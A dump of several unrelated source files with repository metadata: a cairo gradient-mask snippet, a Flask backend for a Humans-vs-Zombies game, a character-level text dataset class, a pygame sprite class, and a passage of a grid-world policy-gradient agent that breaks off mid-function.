2020-03-24T15:40:18.000Z
|
2021-12-13T19:46:09.000Z
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 4
|
2018-03-29T21:59:55.000Z
|
2019-12-16T14:56:38.000Z
|
# NOTE(review): snippet fragment -- `snippet_normalize`, `cr`, `width`,
# `height` and the cairo import are presumably supplied by the snippet
# runner that executes this file; confirm against the host application.
snippet_normalize (cr, width, height)

# Diagonal linear gradient used as the paint source.
pattern = cairo.LinearGradient (0, 0, 1, 1)
pattern.add_color_stop_rgb (0, 0, 0.3, 0.8)
pattern.add_color_stop_rgb (1, 0, 0.8, 0.3)

# Radial alpha mask: opaque at radius 0.25, fully transparent by 0.5.
mask = cairo.RadialGradient (0.5, 0.5, 0.25, 0.5, 0.5, 0.5)
mask.add_color_stop_rgba (0, 0, 0, 0, 1)
mask.add_color_stop_rgba (0.5, 0, 0, 0, 0)

# Paint the gradient through the mask.
cr.set_source (pattern)
cr.mask (mask)
| 27.384615
| 59
| 0.685393
|
4a0ebb6362d3a2b2cfebb68051abaedd0c6874d0
| 8,148
|
py
|
Python
|
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
    """Entry-point stub; intentionally does nothing (see file TODO)."""
    pass

if __name__ == '__main__':
    main(sys.argv)
# [START app]
import logging
import sys
import traceback
import time
import random
from api_helpers import AppError, respondError
from firebase import firebase
from flask import abort, Flask, jsonify, make_response, request, g
from google.appengine.ext import ndb
import flask_cors
import google.auth.transport.requests
import google.oauth2.id_token
import requests_toolbelt.adapters.appengine
import json
import threading
import api_calls
import constants
import in_memory_store as store
import config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)

# Route the requests library through App Engine's urlfetch transport.
requests_toolbelt.adapters.appengine.monkeypatch()

HTTP_REQUEST = google.auth.transport.requests.Request()

app = Flask(__name__)
flask_cors.CORS(app)  # enable CORS on all routes

# Shared in-memory game state, serialized by api_mutex (acquired in
# HandleBatchRequest).
game_state = store.InMemoryStore()
api_mutex = threading.Lock()
def GetFirebase():
    """Get a Firebase connection, cached in the application context."""
    db = getattr(g, '_database', None)
    if db is None:
        # First use in this app context: authenticate as admin and cache
        # the connection on flask.g for reuse within the request.
        auth = firebase.FirebaseAuthentication(
            config.FIREBASE_SECRET, config.FIREBASE_EMAIL, admin=True)
        db = firebase.FirebaseApplication(
            config.FIREBASE_CONFIG['databaseURL'], authentication=auth)
        g._database = db
    return db
# Flask error handlers.  The original code defined all three functions
# with the same name (HandleError), so each def clobbered the previous
# module attribute; Flask kept working only because errorhandler()
# captures the function at decoration time.  Distinct names fix that.
# The print-before-docstring order is also fixed so the docstrings are
# real docstrings; print(x) with one argument behaves the same on
# Python 2 and 3.
@app.errorhandler(api_calls.InvalidInputError)
def HandleInvalidInputError(e):
    """Pretty print data validation errors."""
    print(e.message)
    return 'The request is not valid. %s' % e.message, 500


@app.errorhandler(AppError)
def HandleAppError(e):
    """Pretty print application-level errors."""
    print(e.message)
    return 'Something went wrong. %s' % e.message, 500


@app.errorhandler(500)
def HandleServerError(e):
    """Catch-all for unhandled exceptions."""
    logging.exception(e)
    print(e)
    return '500: %r %r' % (type(e), e), 500
# Dispatch table mapping API method names to their api_calls handlers.
# Four entries ('addRequestCategory', 'updateRequestCategory',
# 'addRequest', 'addResponse') were listed twice with identical values;
# the duplicates have been removed (a dict literal keeps only one copy
# anyway, so behavior is unchanged).
methods = {
    'register': api_calls.Register,
    'createGame': api_calls.AddGame,
    'updateGame': api_calls.UpdateGame,
    'addAdmin': api_calls.AddGameAdmin,
    'createGroup': api_calls.AddGroup,
    'updateGroup': api_calls.UpdateGroup,
    'addPlayerToGroup': api_calls.AddPlayerToGroup,
    'removePlayerFromGroup': api_calls.RemovePlayerFromGroup,
    'createPlayer': api_calls.AddPlayer,
    'addGun': api_calls.AddGun,
    'updateGun': api_calls.UpdateGun,
    'assignGun': api_calls.AssignGun,
    'updatePlayer': api_calls.UpdatePlayer,
    'addMission': api_calls.AddMission,
    'deleteMission': api_calls.DeleteMission,
    'updateMission': api_calls.UpdateMission,
    'createChatRoom': api_calls.AddChatRoom,
    'updateChatRoom': api_calls.UpdateChatRoom,
    # 'sendChatMessage': api_calls.SendChatMessage,
    'addRequestCategory': api_calls.AddRequestCategory,
    'updateRequestCategory': api_calls.UpdateRequestCategory,
    'addRequest': api_calls.AddRequest,
    'addResponse': api_calls.AddResponse,
    'addRewardCategory': api_calls.AddRewardCategory,
    'updateRewardCategory': api_calls.UpdateRewardCategory,
    'addReward': api_calls.AddReward,
    'addRewards': api_calls.AddRewards,
    'claimReward': api_calls.ClaimReward,
    'sendNotification': api_calls.SendNotification,
    'queueNotification': api_calls.QueueNotification,
    'updateQueuedNotification': api_calls.UpdateQueuedNotification,
    'registerUserDevice': api_calls.RegisterUserDevice,
    'updateNotification': api_calls.UpdateNotification,
    'addLife': api_calls.AddLife,
    'infect': api_calls.Infect,
    'joinResistance': api_calls.JoinResistance,
    'joinHorde': api_calls.JoinHorde,
    'setAdminContact': api_calls.SetAdminContact,
    'addQuizQuestion': api_calls.AddQuizQuestion,
    'updateQuizQuestion': api_calls.UpdateQuizQuestion,
    'updateMap': api_calls.UpdateMap,
    'addQuizAnswer': api_calls.AddQuizAnswer,
    'updateChatRoomMembership': api_calls.UpdateChatRoomMembership,
    'updateQuizAnswer': api_calls.UpdateQuizAnswer,
    'addDefaultProfileImage': api_calls.AddDefaultProfileImage,
    'DeleteTestData': api_calls.DeleteTestData,
    'DumpTestData': api_calls.DumpTestData,
    'createMap': api_calls.CreateMap,
    'addMarker': api_calls.AddMarker,
    'updatePlayerMarkers': api_calls.UpdatePlayerMarkers,
    'executeNotifications': api_calls.ExecuteNotifications,
    'syncFirebase': api_calls.SyncFirebase,
}
@app.route('/')
def index():
    """Root endpoint: a static HTML landing banner."""
    banner = "<h1>Welcome To PlayHvZ (backend)!</h1>"
    return banner
@app.route('/help')
def ApiHelp():
    """List every API method with its docstring, '---'-separated."""
    entries = []
    for name, handler in methods.iteritems():
        entries.append('%s: %s' % (name, handler.__doc__))
    return '\n---\n\n'.join(entries)
@app.route('/test', methods=['GET'])
def get_testdata():
    """Return the Firebase 'testdata' node as JSON (debug endpoint)."""
    testdata = GetFirebase().get('testdata', None)
    return jsonify(testdata)
@app.route('/gun', methods=['GET'])
def GetGun():
    """Look up one gun by its ?gunId=... query parameter in Firebase."""
    gun = request.args['gunId']
    return jsonify(GetFirebase().get('/guns', gun))
@app.route('/cronNotification', methods=['GET'])
def CronNotification():
    """App Engine cron hook that fires pending notifications.

    Only requests carrying the X-Appengine-Cron header are accepted.
    """
    cron_key = 'X-Appengine-Cron'
    if cron_key not in request.headers or not request.headers[cron_key]:
        return 'Unauthorized', 403
    HandleSingleRequest('executeNotifications', {})
    return 'OK'
@app.route('/cronSyncFirebase', methods=['GET'])
def CronSyncFirebase():
    """App Engine cron hook that re-syncs the in-memory state to Firebase.

    Only requests carrying the X-Appengine-Cron header are accepted.
    """
    cron_key = 'X-Appengine-Cron'
    if cron_key not in request.headers or not request.headers[cron_key]:
        return 'Unauthorized', 403
    HandleSingleRequest('syncFirebase', {})
    return 'OK'
@app.route('/stressTest', methods=['POST'])
def StressTest():
    """Load-test endpoint: time 50 sequential 'register' API calls."""
    begin_time = time.time()
    for i in range(0, 50):
        # Random userId so every call registers a distinct user.
        HandleSingleRequest('register', {
            'requestingUserId': None,
            'requestingUserToken': 'blark',
            'requestingPlayerId': None,
            'userId': 'user-wat-%d' % random.randint(0, 2**52),
        })
    end_time = time.time()
    print "Did 50 requests in %f seconds" % (end_time - begin_time)
    return ''
@app.route('/stressTestBatch', methods=['POST'])
def StressTestBatch():
begin_time = time.time()
requests = []
for i in range(0, 300):
requests.append({
'method': 'register',
'body': {
'requestingUserId': None,
'requestingUserIdJwt': 'blark',
'requestingPlayerId': None,
'userId': 'user-wat-%d' % random.randint(0, 2**52),
}
})
HandleBatchRequest(requests)
end_time = time.time()
print "Did 50 requests in %f seconds" % (end_time - begin_time)
return ''
@app.route('/api/<method>', methods=['POST'])
def SingleEndpoint(method):
    """POST /api/<method>: run one API call; the JSON body is its input."""
    return jsonify(HandleSingleRequest(method, request.get_json(force=True)))
@app.route('/api/batch', methods=['POST'])
def BatchEndpoint():
    """POST /api/batch: run a JSON list of {'method', 'body'} requests."""
    return jsonify(HandleBatchRequest(json.loads(request.data)))
def HandleSingleRequest(method, body):
    """Run one API call by wrapping it in a batch of size one."""
    return HandleBatchRequest([{'method': method, 'body': body}])[0]
def HandleBatchRequest(requests):
game_state.maybe_load(GetFirebase())
results = []
try:
api_mutex.acquire()
game_state.start_transaction()
for i, request in enumerate(requests):
method = request['method']
body = request['body']
print "Handling request %d: %s" % (i, method)
print "Body:"
print body
results.append(CallApiMethod(method, body))
except:
print "Unexpected error:", sys.exc_info()[0]
traceback.print_exc()
raise
finally:
game_state.commit_transaction()
api_mutex.release()
return results
def CallApiMethod(method, request_body):
    """Dispatch one API call by name; unknown names raise AppError."""
    try:
        handler = methods[method]
    except KeyError:
        raise AppError("Invalid method %s" % method)
    return handler(request_body, game_state)
# vim:ts=2:sw=2:expandtab
| 29.846154
| 75
| 0.732327
|
4a0ebbf38ee0a828334e6f1f38957e30ea21888b
| 2,414
|
py
|
Python
|
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
Sent.py
|
Jaehoon-Cha-Data/Natural-Language-Process
|
7f032a87a354f45352516e986b621f50db2207f8
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Thu Oct 10 11:09:46 2019
@author: jaehooncha
@email: chajaehoon79@gmail.com
"""
import numpy as np
class Sent(object):
    """Character-level sequence dataset built from a text file.

    Reads up to the first 10 cleaned lines of `dataDir`, joins them into
    one string, builds char<->index vocabularies and sliding-window
    (input, next-char) training sequences of length `seq_len`.
    """

    def __init__(self, dataDir, seq_len):
        self.dataDir = dataDir
        self.seq_len = seq_len
        self.timetxt = []
        with open(dataDir, 'r', encoding = 'utf-8') as f:
            for ele in f:
                # Strip tabs/newlines/punctuation and lowercase each line.
                ele = ele.replace('\t', ' ').replace('\n', '').replace('.', '').replace("'", '').replace(",", '').lower()
                self.timetxt.append(ele)
        self.timetxt = self.timetxt[:10]  # keep only the first 10 lines
        self.sent = '. '.join(self.timetxt)
        # Vocabulary: note the ordering of set() is not deterministic
        # across runs, so char indices differ between processes.
        self.char_set = list(set(self.sent))
        self.char_dic = {w: i for i, w in enumerate(self.char_set)}
        self.idx_dic = {i: w for i, w in enumerate(self.char_set)}
        self.num_char = len(self.char_set)
        self.make_sequece()
        self.num_examples = len(self.train_x)
        self.index_in_epoch = 0

    def make_sequece(self):
        """Build train_x/train_y as index arrays of shifted windows."""
        self.X = []
        self.Y = []
        for i in range(0, len(self.sent) - self.seq_len):
            x_str = self.sent[i:i + self.seq_len]
            y_str = self.sent[i + 1: i + self.seq_len + 1]  # shifted by one
            x = [self.char_dic[c] for c in x_str] # x str to index
            y = [self.char_dic[c] for c in y_str] # y str to index
            self.X.append(x)
            self.Y.append(y)
        self.train_x = np.array(self.X)
        self.train_y = np.array(self.Y)

    def next_train_batch(self, batch_size, shuffle=True):
        """Return the next (x, y) training batch.

        NOTE(review): the `shuffle` flag is never consulted -- shuffling
        always happens at the start of an epoch.  Also, the tail-of-epoch
        branch samples from the *unshuffled* train_x/train_y rather than
        _train_x/_train_y; looks unintentional, verify before changing.
        """
        start = self.index_in_epoch
        if start == 0:
            # New epoch: reshuffle into _train_x/_train_y.
            perm0 = np.arange(self.num_examples)
            np.random.shuffle(perm0)
            self._train_x = self.train_x[perm0]
            self._train_y = self.train_y[perm0]
        if start + batch_size > self.num_examples:
            # Not enough examples left: draw a random batch and reset.
            rand_index = np.random.choice(self.num_examples, size = (batch_size), replace = False)
            epoch_x, epoch_y = self.train_x[rand_index], self.train_y[rand_index]
            self.index_in_epoch = 0
            return epoch_x, epoch_y
        else:
            self.index_in_epoch += batch_size
            end = self.index_in_epoch
            epoch_x, epoch_y = self._train_x[start:end], self._train_y[start:end]
            return epoch_x, epoch_y
| 31.763158
| 121
| 0.53894
|
4a0ebbf769d1ffe367311a1c4e4ff4e13c50f661
| 1,838
|
py
|
Python
|
Sprites.py
|
iamabeljoshua/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | 2
|
2016-10-06T10:48:24.000Z
|
2016-10-11T16:08:00.000Z
|
Sprites.py
|
ferguson-abel/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | 1
|
2021-03-12T18:15:45.000Z
|
2021-04-01T17:55:41.000Z
|
Sprites.py
|
iamabeljoshua/Space-Shooter
|
dcd0da3f2094c3db339a243e8c728cb2f27dda11
|
[
"MIT"
] | null | null | null |
#Author: Joshua Abel
#year: 2014
#twitter: @ferguson_abel
import pygame
class Sprite():
    """A simple pygame sprite with position, speed and movement helpers."""

    # Direction constants accepted by move().
    LEFT = "left"
    RIGHT = "right"
    UP = "up"
    DOWN = "down"

    def __init__(self, img, position):
        self.img = img
        self.img_rect = self.img.get_rect()
        self.s_pos = position
        self.img_rect.topleft = self.s_pos
        self.speed = 0  # pixels per move() call; set via set_speed()

    def set_img(self, img):
        """Replace the sprite image and refresh the cached rect."""
        try:
            self.img = img
            self.img_rect = self.img.get_rect()
        except AttributeError:
            raise AttributeError("the value specified for img must be an image type")
        except ValueError:
            raise ValueError("incorrect argument specified")

    def get_img(self):
        """Return the (image, rect) pair."""
        return self.img, self.img_rect

    def set_speed(self, s):
        """Set the movement step in pixels; must be in (0, 50]."""
        if (s > 0 and s <= 50):
            self.speed = s
        else:
            raise ValueError("the speed must be between one and 50")

    def update(self):
        """Blit the sprite onto the current display surface."""
        surface = pygame.display.get_surface()
        surface.blit(self.img, self.img_rect)

    def move(self, const):
        """Move one speed-step in one of the four directions.

        `const` is one of the LEFT/RIGHT/UP/DOWN class constants.
        (Removed: the old code fetched the display size here but never
        used it -- a dead pygame.display.get_surface() call.)
        """
        if (const == "left"):
            self.img_rect.move_ip(-1 * self.speed, 0)
        if (const == "right"):
            self.img_rect.move_ip(self.speed, 0)
        if (const == "up"):
            self.img_rect.move_ip(0, -1 * self.speed)
        if (const == "down"):
            self.img_rect.move_ip(0, self.speed)

    def get_pos(self):
        """Return the sprite's current top-left position."""
        return self.img_rect.topleft

    def set_pos(self, pos):
        """Move the sprite's top-left corner to `pos`."""
        self.img_rect.topleft = pos
| 31.152542
| 104
| 0.567465
|
4a0ebd109511c888f5f913357e449e507c80b039
| 9,431
|
py
|
Python
|
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
index.py
|
jDan735/covid-19_bot
|
a359e1b611031dab6070dea9dee68092a02ca7d8
|
[
"MIT"
] | null | null | null |
import telebot
import COVID19Py
import json
import sys
import time
sys.path.insert(0, "./lib/")
from lib import *
import covid19
# Country grouping tree used by /regions to build the nested menus.
with open("./botdata/countries.json", "r", encoding="utf-8") as datafile:
    data = json.loads(datafile.read())
# Bot token is kept outside the source tree.
with open("./botdata/token.txt") as token:
    bot = telebot.TeleBot(token.read())
@bot.message_handler(commands=['start'])
def start_message(message):
    # /start — greet the user and point them at /statistic.
    bot.send_message(message.chat.id, 'Привет! Просмотреть статистику можно используя команду /statistic')
@bot.message_handler(commands=["statistic"])
def send_statistic(message):
    # /statistic — send aggregated worldwide COVID-19 numbers as Markdown.
    world = covid19.getWorld()
    # NOTE(review): the "recovered today" delta is hard-coded to "0" —
    # presumably the API response lacks a todayRecovered field; confirm.
    bot.send_message(message.chat.id, "🌎 *Весь мир*\n\n" +
                     "📊 *" + getPrettyNumber(world["cases"]) + "* случаев\n" +
                     "🩹 *" + getPrettyNumber(world["tests"]) + "* тестов\n\n" +
                     "🤒 *" + getPrettyNumber(world["active"]) + "* `+" + getPrettyNumber(world["todayCases"]) + "` болеет\n" +
                     "💊 *" + getPrettyNumber(world["recovered"]) + "* `+" + "0" + "` здоровых\n" +
                     "💀 *" + getPrettyNumber(world["deaths"]) + "* `+" + getPrettyNumber(world["todayDeaths"]) + "` смертей",
                     parse_mode = "Markdown")
def loadMenu (info, message, text):
    """Send an inline-keyboard menu: one button per entry of *info*.

    Each entry's first element is used as both label and callback_data.
    NOTE(review): near-duplicate of loadMenuFromCall below — this one
    replies to message.from_user.id, the other to message.chat.id.
    """
    keyboard = telebot.types.InlineKeyboardMarkup()
    for item in info:
        keyboard.add(telebot.types.InlineKeyboardButton(text=item[0], callback_data=item[0]))
    bot.send_message(message.from_user.id, text=text, reply_markup=keyboard)
def loadMenuFromCall (info, message, text):
    """Same as loadMenu but addressed to the chat a callback came from."""
    keyboard = telebot.types.InlineKeyboardMarkup()
    for item in info:
        keyboard.add(telebot.types.InlineKeyboardButton(text=item[0], callback_data=item[0]))
    bot.send_message(message.chat.id, text=text, reply_markup=keyboard)
@bot.message_handler(commands=["regions"])
def getOurRegion (message):
    """/regions — show the top-level menu of continents."""
    keyboard = telebot.types.InlineKeyboardMarkup()
    keyboard.add(telebot.types.InlineKeyboardButton(text="Азия", callback_data="asia"))
    keyboard.add(telebot.types.InlineKeyboardButton(text="Америка", callback_data="america"))
    keyboard.add(telebot.types.InlineKeyboardButton(text="Африка", callback_data="africa"))
    keyboard.add(telebot.types.InlineKeyboardButton(text="Океания", callback_data="oceania"))
    keyboard.add(telebot.types.InlineKeyboardButton(text="Европа", callback_data="europa"))
    bot.send_message(message.from_user.id, text = "Выберите часть света", reply_markup=keyboard)
@bot.callback_query_handler(func=lambda call: True)
def callback_worker(call):
    """Handle every inline-keyboard press from the /regions menu tree.

    The original was ~120 lines of copy-pasted if-blocks; it is collapsed
    into two dispatch tables with identical behavior:

    * ``menus`` — callback values that open a sub-menu of (label, callback)
      buttons, exactly as the original keyboards were built.
    * ``region_paths`` — callback values that show statistics; each maps to
      the index path into the ``data`` country tree that the original code
      indexed literally (e.g. china -> data[0][1][0][1]).  The path is
      resolved lazily so a missing branch only fails for its own button,
      as before.
    """
    # The pressed menu message is always removed first (as in the original).
    bot.delete_message(call.from_user.id, call.message.message_id)

    menus = {
        "asia": [("Китай", "china"), ("Остальное", "asia_rest")],
        "america": [("Северная Америка", "north_america"), ("Южная Америка", "south_america")],
        "south_america": [("Карибские страны", "caribian"), ("Остальные страны", "south_america_rest")],
        "europa": [("Евросоюз", "EU"), ("СНГ", "CIS"), ("Остальные", "europa_rest")],
        "europa_rest": [("Югославия", "yugoslavia"), ("Остальные", "europa_rest_rest")],
        "EU": [("Чехословакия", "czech"), ("Бенилюкс", "benilux"), ("Прибалтика", "pribaltica"),
               ("Балканы", "balcans"), ("Скандинавия", "scandinavia"), ("Остальные", "eu_rest")],
    }
    region_paths = {
        "china": (0, 1, 0, 1),
        "asia_rest": (0, 1, 1, 1),
        "north_america": (1, 1, 0, 1),
        "caribian": (1, 1, 1, 1, 0, 1),
        "south_america_rest": (1, 1, 1, 1, 1, 1),
        "africa": (2, 1),
        "oceania": (3, 1),
        "CIS": (4, 1, 0, 1),
        "yugoslavia": (4, 1, 1, 1, 0, 1),
        "europa_rest_rest": (4, 1, 1, 1, 1, 1),
        "czech": (4, 1, 2, 1, 0, 1),
        "benilux": (4, 1, 2, 1, 1, 1),
        "pribaltica": (4, 1, 2, 1, 2, 1),
        "scandinavia": (4, 1, 2, 1, 3, 1),
        "eu_rest": (4, 1, 2, 1, 4, 1),
        "balcans": (4, 1, 2, 1, 5, 1),
    }

    if call.data in menus:
        keyboard = telebot.types.InlineKeyboardMarkup()
        for label, cb_value in menus[call.data]:
            keyboard.add(telebot.types.InlineKeyboardButton(text=label, callback_data=cb_value))
        bot.send_message(call.message.chat.id, text = "Выберите регион", reply_markup = keyboard)

    if call.data in region_paths:
        # Walk the literal index path into the country grouping tree.
        countries = data
        for idx in region_paths[call.data]:
            countries = countries[idx]
        data2 = covid19.getCountries()
        for country in countries:
            sendLocationStats(call, data2[country[1]], country)
@bot.message_handler(commands=["time"])
def sendStats (message):
    # /time — echo back the text following the command.
    bot.send_message(message.chat.id, message.text.replace("/time ", ""))


# Start long polling (blocks the main thread forever).
bot.polling()
| 45.781553
| 118
| 0.638426
|
4a0ebd1ff2ef5443736439ddbeacea3de41d1e0e
| 4,798
|
py
|
Python
|
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
ros/src/twist_controller/dbw_node.py
|
alextreib/CarND-Capstone
|
3ac2f9e42b8d047cdce9b41c1e1456c3a25f6eba
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
from std_msgs.msg import Bool
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle specific values (like vehicle_mass,
wheel_base) etc should not be altered in these files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish it on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
    """Drive-by-wire node: turns twist commands into throttle/brake/steer.

    Subscribes to /twist_cmd, /current_velocity and /vehicle/dbw_enabled,
    runs a 50 Hz loop that asks the Controller for actuation values, and
    publishes them only while drive-by-wire is enabled.

    Bug fix vs. the original: dbw_enabled_cb stored the whole std_msgs/Bool
    *message object* instead of its ``data`` payload.  A message object is
    always truthy, so ``if self.dbw_enabled:`` would publish commands even
    when DBW was switched off (e.g. a safety driver taking over).
    """

    def __init__(self):
        rospy.init_node('dbw_node')

        # Vehicle-specific parameters (launch-file values must not change).
        vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
        fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
        brake_deadband = rospy.get_param('~brake_deadband', .1)
        decel_limit = rospy.get_param('~decel_limit', -5)
        accel_limit = rospy.get_param('~accel_limit', 1.)
        wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
        wheel_base = rospy.get_param('~wheel_base', 2.8498)
        steer_ratio = rospy.get_param('~steer_ratio', 14.8)
        max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
        max_steer_angle = rospy.get_param('~max_steer_angle', 8.)

        self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
                                         SteeringCmd, queue_size=1)
        self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
                                            ThrottleCmd, queue_size=1)
        self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
                                         BrakeCmd, queue_size=1)

        # Create a Controller object
        self.controller = Controller(vehicle_mass=vehicle_mass, fuel_capacity=fuel_capacity, brake_deadband=brake_deadband, decel_limit=decel_limit, accel_limit=accel_limit,
                                     wheel_radius=wheel_radius, wheel_base=wheel_base, steer_ratio=steer_ratio, max_lat_accel=max_lat_accel, max_steer_angle=max_steer_angle)

        # Subscriber - data needed
        rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
        rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
        rospy.Subscriber('/current_velocity', TwistStamped, self.velocity_cb)

        # State filled in by the callbacks above; None means "not yet seen".
        self.current_vel = None
        self.curr_ang_vel = None
        self.dbw_enabled = None
        self.linear_vel = None
        self.angular_vel = None
        self.throttle = self.steering = self.brake = 0

        self.loop()

    def loop(self):
        """50 Hz control loop; runs until ROS shuts down."""
        rate = rospy.Rate(50)  # 50Hz - important - don't change
        while not rospy.is_shutdown():
            # Only control once velocity and twist data have arrived.
            if not None in (self.current_vel, self.linear_vel, self.angular_vel):
                self.throttle, self.brake, self.steering = self.controller.control(
                    self.current_vel, self.dbw_enabled, self.linear_vel, self.angular_vel)
            # Never actuate while a human is driving (DBW disabled).
            if self.dbw_enabled:
                self.publish(self.throttle, self.brake, self.steering)
            rate.sleep()

    def dbw_enabled_cb(self, msg):
        # FIX: store the Bool payload, not the message object (which is
        # always truthy and would defeat the dbw_enabled check in loop()).
        self.dbw_enabled = msg.data

    def twist_cb(self, msg):
        # Proposed velocities from the waypoint follower.
        self.linear_vel = msg.twist.linear.x
        self.angular_vel = msg.twist.angular.z

    def velocity_cb(self, msg):
        # Measured vehicle speed.
        self.current_vel = msg.twist.linear.x

    def publish(self, throttle, brake, steer):
        """Publish one set of actuation commands."""
        tcmd = ThrottleCmd()
        tcmd.enable = True
        tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
        tcmd.pedal_cmd = throttle
        self.throttle_pub.publish(tcmd)

        scmd = SteeringCmd()
        scmd.enable = True
        scmd.steering_wheel_angle_cmd = steer
        self.steer_pub.publish(scmd)

        bcmd = BrakeCmd()
        bcmd.enable = True
        bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
        bcmd.pedal_cmd = brake
        self.brake_pub.publish(bcmd)
if __name__ == '__main__':
    # Constructing the node starts its 50 Hz control loop (see DBWNode.loop).
    DBWNode()
| 40.661017
| 173
| 0.682159
|
4a0ebd92ad292ef5a2507c77d68b9117b3f1e4f6
| 15,134
|
py
|
Python
|
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
MCPGM.py
|
buivn/paperImplementation
|
52371926d1f6cc8fcfcdf302596ce3bdae4beac6
|
[
"BSD-2-Clause"
] | null | null | null |
import sys
import random
from tkinter import *
import time
import math, queue
from Init_map import *
import threading
import numpy as np
import array
# Grid world and learning hyper-parameters.
map_dimension = 10      # grid is map_dimension x map_dimension cells
numberofaction = 4      # W, N, E, S
spacedimension = 2      # x and y coordinates
# Length of the policy parameter vector: one weight per (action, axis, cell).
theta_leng = map_dimension*spacedimension*numberofaction
theta = np.zeros(theta_leng)
#phi_BF = np.one(80)
des_return = 1.0        # return assigned at the terminal (destination) state
reward = -0.05          # per-step reward (negative: encourages short paths)
# Discount factor
gama = 0.997
# Learning rate
alpha = 0.003
# Number of episode
NOE = 250
# reward value
#reward = -0.1
#epsilon = 0.1
#optimumagentpath = []
actionset = ('W', 'N', 'E', 'S')
class agent(threading.Thread):
    """One learning agent on the grid world.

    Runs Monte-Carlo policy-gradient (REINFORCE-style) episodes in its own
    thread, animating itself on the shared Tk canvas.  The policy is a
    softmax over linear preferences h(s,a) = phi(s,a) . theta, where phi is
    a sparse binary feature vector (see FSR_function) and theta is the
    module-level parameter vector shared by all agents.
    """

    def __init__(self, agentID, init_statex, init_statey, des_statex, des_statey, color, w):
        threading.Thread.__init__(self)
        self.agentID = agentID
        # Control the robot position on the screen
        self.current_state_x = init_statex #random.randint(0, map_dimension-1)
        self.current_state_y = init_statey #random.randint(0, map_dimension-1)
        # Pixel coordinates: 45 px per grid cell plus a 43 px margin.
        self.px = self.current_state_x*45 + 43
        self.py = self.current_state_y*45 + 43
        # start state
        self.start_state_x = self.current_state_x
        self.start_state_y = self.current_state_y
        self.startx = self.start_state_x*45 + 43
        self.starty = self.start_state_y*45 + 43
        self.dest_x = des_statex #random.randint(0, map_dimension-1)
        self.dest_y = des_statey # random.randint(0, map_dimension-1)
        self.desx = self.dest_x*45 + 43
        self.desy = self.dest_y*45 + 43
        self.w = w
        # create the agent visually
        self.agent = self.w.create_rectangle(self.px-11,self.py-11,self.px+11,self.py+11,fill=color)
        # create the starting position
        self.init_state = self.w.create_rectangle(self.px-4,self.py-4,self.px+4,self.py+4,fill=color)

    # function to run
    def run(self):
        # Thread entry point: run the whole learning procedure.
        self.learning_loop()

    # resetting the agent after each episode
    def reset(self):
        # move the agent back to the starting point to re-pathing
